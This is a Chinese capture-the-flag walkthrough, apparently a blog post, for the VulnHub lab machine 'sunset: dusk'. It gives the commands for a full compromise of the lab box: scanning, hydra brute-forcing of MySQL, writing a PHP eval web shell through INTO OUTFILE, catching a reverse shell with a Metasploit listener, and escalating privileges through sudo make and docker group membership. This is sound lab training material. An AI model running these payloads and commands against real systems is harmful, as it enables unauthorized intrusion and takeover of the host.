• sunset: dusk


    靶机地址:https://www.vulnhub.com/entry/sunset-dusk,404/

    扫描靶机IP:192.168.40.165

    nmap -sP 192.168.40.*

    扫描靶机端口,可以看到开放了很多端口

    nmap -sV -p- 192.168.40.165

    先访问80端口

    再看一下8080端口,给了当前目录下的文件和目录路径

    FTP匿名登录失败,不过靶机还开放了3306端口,尝试用远程登录mysql,不知道密码,先爆破

     hydra -l root -P /usr/share/wordlists/rockyou.txt -t 50 mysql://192.168.40.165

    mysql用户名为 root ,密码为 password ,远程登录mysql,没有找到有用的信息

    mysql -h 192.168.40.165 -uroot -ppassword

    查看有没有权限写马 , secure_file_priv 参数为空,不会限制mysqld 导入和导出文件,那么就可以在 /var/tmp/ 写马

     show variables like "%secure%";

    将一句话木马写入到 /var/tmp/shell.php

    select "<?php @eval($_POST['cmd']);?>" INTO OUTFILE "/var/tmp/shell.php";

     

    用蚁剑去连接写入的一句话木马(注意是8080端口)

     然后上传一个反弹shell的php脚本到靶机上

     

     在kali上用msf设置参数监听,再访问靶机 php-reverse-shell.php 的页面获取反弹shell

    use exploit/multi/handler
    set lhost 192.168.40.129
    set lport 1234
    run

     用python获取tty

    python -c 'import pty;pty.spawn("/bin/bash")'

    用 sudo -l 可以发现可以以 dusk 用户 执行 ping 、 make 、sl

    直接用 make 命令提权到 dusk  (这个网站收集了很多提权姿势)

    COMMAND='/bin/sh'
    sudo -u dusk  make -s --eval=$'x:
    	-'"$COMMAND"

    现在是 dusk 用户,同时发现 dusk 是 docker 组的

    直接用 docker 提权

    docker run -v /:/mnt  -it alpine

    获取flag

  • 相关阅读:
    docker容器安装使用
    hashMap学习
    spark运行方式及其常用参数
    java面试题基础
    大数据面试题
    java面试题
    Java四种线程池
    大数据
    pyspark 日期格式
    CMake error:System Error:No such file or directory CMake error:Could not open file for write in copy operation xxxx.ros_Config.cmake.tmp.
  • 原文地址:https://www.cnblogs.com/gaonuoqi/p/13996428.html
Copyright © 2020-2023  润新知